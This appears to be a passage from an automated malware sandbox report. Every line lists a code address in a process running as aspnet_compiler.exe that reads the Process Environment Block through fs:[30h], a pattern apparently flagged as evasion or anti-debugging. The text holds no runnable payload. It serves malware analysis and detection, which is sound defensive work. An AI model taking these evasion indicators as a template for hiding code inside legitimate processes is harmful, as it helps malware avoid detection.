Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_013CC730 mov eax, dword ptr fs:[00000030h]	4_2_013CC730
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_0138C720 mov eax, dword ptr fs:[00000030h]	4_2_0138C720
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_0138C720 mov eax, dword ptr fs:[00000030h]	4_2_0138C720
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_01350710 mov eax, dword ptr fs:[00000030h]	4_2_01350710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_01380710 mov eax, dword ptr fs:[00000030h]	4_2_01380710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_0138C700 mov eax, dword ptr fs:[00000030h]	4_2_0138C700
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_01358770 mov eax, dword ptr fs:[00000030h]	4_2_01358770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_01360770 mov eax, dword ptr fs:[00000030h]	4_2_01360770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_01360770 mov eax, dword ptr fs:[00000030h]	4_2_01360770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_01360770 mov eax, dword ptr fs:[00000030h]	4_2_01360770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_01360770 mov eax, dword ptr fs:[00000030h]	4_2_01360770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_01360770 mov eax, dword ptr fs:[00000030h]	4_2_01360770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_01360770 mov eax, dword ptr fs:[00000030h]	4_2_01360770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_01360770 mov eax, dword ptr fs:[00000030h]	4_2_01360770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_01360770 mov eax, dword ptr fs:[00000030h]	4_2_01360770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_01360770 mov eax, dword ptr fs:[00000030h]	4_2_01360770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_01360770 mov eax, dword ptr fs:[00000030h]	4_2_01360770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_01360770 mov eax, dword ptr fs:[00000030h]	4_2_01360770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_01360770 mov eax, dword ptr fs:[00000030h]	4_2_01360770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_013DE75D mov eax, dword ptr fs:[00000030h]	4_2_013DE75D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_01350750 mov eax, dword ptr fs:[00000030h]	4_2_01350750
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_013D4755 mov eax, dword ptr fs:[00000030h]	4_2_013D4755
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_01392750 mov eax, dword ptr fs:[00000030h]	4_2_01392750
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_01392750 mov eax, dword ptr fs:[00000030h]	4_2_01392750
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_0138674D mov esi, dword ptr fs:[00000030h]	4_2_0138674D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_0138674D mov eax, dword ptr fs:[00000030h]	4_2_0138674D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_0138674D mov eax, dword ptr fs:[00000030h]	4_2_0138674D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_013507AF mov eax, dword ptr fs:[00000030h]	4_2_013507AF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_013547FB mov eax, dword ptr fs:[00000030h]	4_2_013547FB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_013547FB mov eax, dword ptr fs:[00000030h]	4_2_013547FB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_013727ED mov eax, dword ptr fs:[00000030h]	4_2_013727ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_013727ED mov eax, dword ptr fs:[00000030h]	4_2_013727ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_013727ED mov eax, dword ptr fs:[00000030h]	4_2_013727ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_013DE7E1 mov eax, dword ptr fs:[00000030h]	4_2_013DE7E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_0135C7C0 mov eax, dword ptr fs:[00000030h]	4_2_0135C7C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_013D07C3 mov eax, dword ptr fs:[00000030h]	4_2_013D07C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_0136E627 mov eax, dword ptr fs:[00000030h]	4_2_0136E627
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_01386620 mov eax, dword ptr fs:[00000030h]	4_2_01386620
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_01388620 mov eax, dword ptr fs:[00000030h]	4_2_01388620
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_0135262C mov eax, dword ptr fs:[00000030h]	4_2_0135262C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_01392619 mov eax, dword ptr fs:[00000030h]	4_2_01392619
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_0141866E mov eax, dword ptr fs:[00000030h]	4_2_0141866E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_0141866E mov eax, dword ptr fs:[00000030h]	4_2_0141866E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_013CE609 mov eax, dword ptr fs:[00000030h]	4_2_013CE609
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_0136260B mov eax, dword ptr fs:[00000030h]	4_2_0136260B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_0136260B mov eax, dword ptr fs:[00000030h]	4_2_0136260B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_0136260B mov eax, dword ptr fs:[00000030h]	4_2_0136260B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_0136260B mov eax, dword ptr fs:[00000030h]	4_2_0136260B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_0136260B mov eax, dword ptr fs:[00000030h]	4_2_0136260B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_0136260B mov eax, dword ptr fs:[00000030h]	4_2_0136260B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_0136260B mov eax, dword ptr fs:[00000030h]	4_2_0136260B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_01382674 mov eax, dword ptr fs:[00000030h]	4_2_01382674
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_0138A660 mov eax, dword ptr fs:[00000030h]	4_2_0138A660
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_0138A660 mov eax, dword ptr fs:[00000030h]	4_2_0138A660
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_0136C640 mov eax, dword ptr fs:[00000030h]	4_2_0136C640
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_013866B0 mov eax, dword ptr fs:[00000030h]	4_2_013866B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_0138C6A6 mov eax, dword ptr fs:[00000030h]	4_2_0138C6A6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_01354690 mov eax, dword ptr fs:[00000030h]	4_2_01354690
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_01354690 mov eax, dword ptr fs:[00000030h]	4_2_01354690
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_013D06F1 mov eax, dword ptr fs:[00000030h]	4_2_013D06F1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_013D06F1 mov eax, dword ptr fs:[00000030h]	4_2_013D06F1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_013CE6F2 mov eax, dword ptr fs:[00000030h]	4_2_013CE6F2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_013CE6F2 mov eax, dword ptr fs:[00000030h]	4_2_013CE6F2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_013CE6F2 mov eax, dword ptr fs:[00000030h]	4_2_013CE6F2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_013CE6F2 mov eax, dword ptr fs:[00000030h]	4_2_013CE6F2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_0138A6C7 mov ebx, dword ptr fs:[00000030h]	4_2_0138A6C7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_0138A6C7 mov eax, dword ptr fs:[00000030h]	4_2_0138A6C7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_013E892B mov eax, dword ptr fs:[00000030h]	4_2_013E892B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_013D892A mov eax, dword ptr fs:[00000030h]	4_2_013D892A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_01348918 mov eax, dword ptr fs:[00000030h]	4_2_01348918
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_01348918 mov eax, dword ptr fs:[00000030h]	4_2_01348918
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_013DC912 mov eax, dword ptr fs:[00000030h]	4_2_013DC912
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_013CE908 mov eax, dword ptr fs:[00000030h]	4_2_013CE908
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_013CE908 mov eax, dword ptr fs:[00000030h]	4_2_013CE908
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_013DC97C mov eax, dword ptr fs:[00000030h]	4_2_013DC97C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_01376962 mov eax, dword ptr fs:[00000030h]	4_2_01376962
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_01376962 mov eax, dword ptr fs:[00000030h]	4_2_01376962
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_01376962 mov eax, dword ptr fs:[00000030h]	4_2_01376962
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_0139096E mov eax, dword ptr fs:[00000030h]	4_2_0139096E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_0139096E mov edx, dword ptr fs:[00000030h]	4_2_0139096E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_0139096E mov eax, dword ptr fs:[00000030h]	4_2_0139096E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_013D0946 mov eax, dword ptr fs:[00000030h]	4_2_013D0946
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_013D89B3 mov esi, dword ptr fs:[00000030h]	4_2_013D89B3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_013D89B3 mov eax, dword ptr fs:[00000030h]	4_2_013D89B3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_013D89B3 mov eax, dword ptr fs:[00000030h]	4_2_013D89B3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_0141A9D3 mov eax, dword ptr fs:[00000030h]	4_2_0141A9D3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_013629A0 mov eax, dword ptr fs:[00000030h]	4_2_013629A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_013629A0 mov eax, dword ptr fs:[00000030h]	4_2_013629A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_013629A0 mov eax, dword ptr fs:[00000030h]	4_2_013629A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_013629A0 mov eax, dword ptr fs:[00000030h]	4_2_013629A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_013629A0 mov eax, dword ptr fs:[00000030h]	4_2_013629A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_013629A0 mov eax, dword ptr fs:[00000030h]	4_2_013629A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_013629A0 mov eax, dword ptr fs:[00000030h]	4_2_013629A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_013629A0 mov eax, dword ptr fs:[00000030h]	4_2_013629A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_013629A0 mov eax, dword ptr fs:[00000030h]	4_2_013629A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_013629A0 mov eax, dword ptr fs:[00000030h]	4_2_013629A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_013629A0 mov eax, dword ptr fs:[00000030h]	4_2_013629A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_013629A0 mov eax, dword ptr fs:[00000030h]	4_2_013629A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_013629A0 mov eax, dword ptr fs:[00000030h]	4_2_013629A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_013509AD mov eax, dword ptr fs:[00000030h]	4_2_013509AD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_013509AD mov eax, dword ptr fs:[00000030h]	4_2_013509AD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_013829F9 mov eax, dword ptr fs:[00000030h]	4_2_013829F9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_013829F9 mov eax, dword ptr fs:[00000030h]	4_2_013829F9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_013DE9E0 mov eax, dword ptr fs:[00000030h]	4_2_013DE9E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_0135A9D0 mov eax, dword ptr fs:[00000030h]	4_2_0135A9D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_0135A9D0 mov eax, dword ptr fs:[00000030h]	4_2_0135A9D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_0135A9D0 mov eax, dword ptr fs:[00000030h]	4_2_0135A9D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_0135A9D0 mov eax, dword ptr fs:[00000030h]	4_2_0135A9D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_0135A9D0 mov eax, dword ptr fs:[00000030h]	4_2_0135A9D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_0135A9D0 mov eax, dword ptr fs:[00000030h]	4_2_0135A9D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_013849D0 mov eax, dword ptr fs:[00000030h]	4_2_013849D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_013E69C0 mov eax, dword ptr fs:[00000030h]	4_2_013E69C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_01372835 mov eax, dword ptr fs:[00000030h]	4_2_01372835
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_01372835 mov eax, dword ptr fs:[00000030h]	4_2_01372835
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_01372835 mov eax, dword ptr fs:[00000030h]	4_2_01372835
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_01372835 mov ecx, dword ptr fs:[00000030h]	4_2_01372835
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_01372835 mov eax, dword ptr fs:[00000030h]	4_2_01372835
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_01372835 mov eax, dword ptr fs:[00000030h]	4_2_01372835
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_0138A830 mov eax, dword ptr fs:[00000030h]	4_2_0138A830
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_013DC810 mov eax, dword ptr fs:[00000030h]	4_2_013DC810
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_013E6870 mov eax, dword ptr fs:[00000030h]	4_2_013E6870
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_013E6870 mov eax, dword ptr fs:[00000030h]	4_2_013E6870
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_013DE872 mov eax, dword ptr fs:[00000030h]	4_2_013DE872
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_013DE872 mov eax, dword ptr fs:[00000030h]	4_2_013DE872
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_01380854 mov eax, dword ptr fs:[00000030h]	4_2_01380854
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_01354859 mov eax, dword ptr fs:[00000030h]	4_2_01354859
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_01354859 mov eax, dword ptr fs:[00000030h]	4_2_01354859
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_01362840 mov ecx, dword ptr fs:[00000030h]	4_2_01362840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_013DC89D mov eax, dword ptr fs:[00000030h]	4_2_013DC89D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_0141A8E4 mov eax, dword ptr fs:[00000030h]	4_2_0141A8E4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_01350887 mov eax, dword ptr fs:[00000030h]	4_2_01350887
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_0138C8F9 mov eax, dword ptr fs:[00000030h]	4_2_0138C8F9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_0138C8F9 mov eax, dword ptr fs:[00000030h]	4_2_0138C8F9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_0137E8C0 mov eax, dword ptr fs:[00000030h]	4_2_0137E8C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_0141AB40 mov eax, dword ptr fs:[00000030h]	4_2_0141AB40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_0137EB20 mov eax, dword ptr fs:[00000030h]	4_2_0137EB20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_0137EB20 mov eax, dword ptr fs:[00000030h]	4_2_0137EB20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_013CEB1D mov eax, dword ptr fs:[00000030h]	4_2_013CEB1D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_013CEB1D mov eax, dword ptr fs:[00000030h]	4_2_013CEB1D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_013CEB1D mov eax, dword ptr fs:[00000030h]	4_2_013CEB1D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_013CEB1D mov eax, dword ptr fs:[00000030h]	4_2_013CEB1D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_013CEB1D mov eax, dword ptr fs:[00000030h]	4_2_013CEB1D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_013CEB1D mov eax, dword ptr fs:[00000030h]	4_2_013CEB1D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_013CEB1D mov eax, dword ptr fs:[00000030h]	4_2_013CEB1D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_013CEB1D mov eax, dword ptr fs:[00000030h]	4_2_013CEB1D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_013CEB1D mov eax, dword ptr fs:[00000030h]	4_2_013CEB1D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_0134CB7E mov eax, dword ptr fs:[00000030h]	4_2_0134CB7E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_01418B28 mov eax, dword ptr fs:[00000030h]	4_2_01418B28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_01418B28 mov eax, dword ptr fs:[00000030h]	4_2_01418B28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_013F8B42 mov eax, dword ptr fs:[00000030h]	4_2_013F8B42
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_013E6B40 mov eax, dword ptr fs:[00000030h]	4_2_013E6B40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_013E6B40 mov eax, dword ptr fs:[00000030h]	4_2_013E6B40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_01360BBE mov eax, dword ptr fs:[00000030h]	4_2_01360BBE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_01360BBE mov eax, dword ptr fs:[00000030h]	4_2_01360BBE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_01358BF0 mov eax, dword ptr fs:[00000030h]	4_2_01358BF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_01358BF0 mov eax, dword ptr fs:[00000030h]	4_2_01358BF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_01358BF0 mov eax, dword ptr fs:[00000030h]	4_2_01358BF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_0137EBFC mov eax, dword ptr fs:[00000030h]	4_2_0137EBFC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_013DCBF0 mov eax, dword ptr fs:[00000030h]	4_2_013DCBF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_013FEBD0 mov eax, dword ptr fs:[00000030h]	4_2_013FEBD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_01350BCD mov eax, dword ptr fs:[00000030h]	4_2_01350BCD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_01350BCD mov eax, dword ptr fs:[00000030h]	4_2_01350BCD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_01350BCD mov eax, dword ptr fs:[00000030h]	4_2_01350BCD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_01370BCB mov eax, dword ptr fs:[00000030h]	4_2_01370BCB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_01370BCB mov eax, dword ptr fs:[00000030h]	4_2_01370BCB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_01370BCB mov eax, dword ptr fs:[00000030h]	4_2_01370BCB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_0138CA38 mov eax, dword ptr fs:[00000030h]	4_2_0138CA38
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_01374A35 mov eax, dword ptr fs:[00000030h]	4_2_01374A35
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_01374A35 mov eax, dword ptr fs:[00000030h]	4_2_01374A35
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_0137EA2E mov eax, dword ptr fs:[00000030h]	4_2_0137EA2E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_0138CA24 mov eax, dword ptr fs:[00000030h]	4_2_0138CA24
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_013DCA11 mov eax, dword ptr fs:[00000030h]	4_2_013DCA11
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_013CCA72 mov eax, dword ptr fs:[00000030h]	4_2_013CCA72
